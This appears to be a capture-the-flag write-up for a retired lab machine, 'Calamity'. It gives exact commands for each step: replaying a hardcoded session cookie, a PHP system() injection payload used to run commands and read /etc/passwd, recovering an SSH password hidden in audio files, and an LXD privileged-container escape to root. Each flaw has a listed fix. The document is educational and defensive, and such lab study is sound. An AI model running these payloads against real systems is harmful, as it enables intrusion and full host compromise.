Calamity
Summary
Target calamity ($TARGET) runs an aging Apache 2.4.18/PHP stack with a single custom admin panel. The panel issued an identical, hardcoded session cookie to every visitor regardless of login outcome; replaying that cookie granted full authenticated access without knowing any real password. The authenticated panel accepted my own HTML — including raw PHP — via a query parameter and evaluated it server-side, turning a one-line payload into a remote-code-execution shell running as the web server account www-data.
Through that shell the user flag was read directly, and two audio files in the public uploads directory were retrieved and found to contain an SSH password hidden in the audio track via steganography. That credential authenticated the local user xalvas over SSH; checking group membership immediately revealed xalvas belonged to the lxd group — a well-known Linux privilege-escalation primitive where any group member can instruct the LXD daemon to launch a privileged container that bind-mounts the entire host filesystem, granting root-level read/write access to every file on the server and completing full compromise.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD3="<a-password-you-choose>"
export PASSWORD5="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 4
nmap -Pn -sV -p 22,80 --script http-title,http-headers $TARGETcurl -sS -i http://$TARGET/curl -sS -i http://$TARGET/admin.phpcurl -sS -i http://$TARGET/uploads/Exact commands 2
curl -sS -i --data 'user=admin&pass=$PASSWORD5' http://$TARGET/admin.phpcurl -sS -i -b "$PASSWORD" http://$TARGET/admin.phpFixReplace the hardcoded session cookie with genuine server-side authenticationCritical
Exact commands 2
curl -sS --max-time 20 -b "$PASSWORD" --get --data-urlencode 'html=<?php system($_GET["cmd"]); ?>' --data-urlencode 'cmd=id' http://$TARGET/admin.phpcurl -sS --max-time 20 -b "$PASSWORD" --get --data-urlencode 'html=<?php system($_GET["cmd"]); ?>' --data-urlencode 'cmd=uname -a' http://$TARGET/admin.phpFixRemove server-side evaluation of user-supplied content and apply strict output encodingCritical
Exact commands 3
curl -sS --max-time 10 -b "$PASSWORD" --get --data-urlencode 'html=<?php system($_GET["cmd"]); ?>' --data-urlencode 'cmd=cat /home/xalvas/user.txt' http://$TARGET/admin.phpcurl -sS --max-time 10 -b "$PASSWORD" --get --data-urlencode 'html=<?php system($_GET["cmd"]); ?>' --data-urlencode 'cmd=ls -la /var/www/html/uploads/' http://$TARGET/admin.phpcurl -sS -o recov.wav http://$TARGET/uploads/recov.wav && curl -sS -o rick.wav http://$TARGET/uploads/rick.wavExact commands 4
curl -sS --max-time 10 -b "$PASSWORD" --get --data-urlencode 'html=<?php system($_GET["cmd"]); ?>' --data-urlencode 'cmd=cat /etc/passwd' http://$TARGET/admin.phpsox recov.wav rick.wav -M mixed.wav remix 1v1 2v-1ffplay mixed.wavsshpass -p '$PASSWORD3' ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password xalvas@$TARGET 'id'FixRemove credentials from web-accessible files and rotate all affected account passwordsHigh
Exact commands 3
sshpass -p '$PASSWORD3' ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password xalvas@$TARGETidls -la /tmp/lxd-bb-image/Exact commands 6
cd /tmp && tar czf lxd-bb.tar.gz -C lxd-bb-image .lxc image import /tmp/lxd-bb.tar.gz --alias bbimagelxc init bbimage privesc -c security.privileged=truelxc config device add privesc hostroot disk source=/ path=/mnt/root recursive=truelxc start privesc && lxc exec privesc -- shcat /mnt/root/root/root.txtFixRemove non-administrator accounts from the lxd group and restrict LXD daemon accessHigh
Attack patterns used
The transferable techniques behind this compromise.
LXD/LXC Group EscapeLinux · Privilege EscalationT1611
What it is
Membership in the lxd (or docker) group is root-equivalent. An unauthorised user imports a minimal image, launches a privileged container with the host filesystem mounted (security.privileged=true, disk source=/), then reads or writes root-owned host files — escaping the container to own the host.
Why it works
The lxd/docker daemons run as root and their group grants full control of that daemon, so group membership bypasses normal privilege boundaries. Remediate by treating these groups as privileged and not adding low-trust users to them.
Read more
Exposed services
| 22/tcp | ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) |
| 80/tcp | http Apache httpd 2.4.18 ((Ubuntu)) |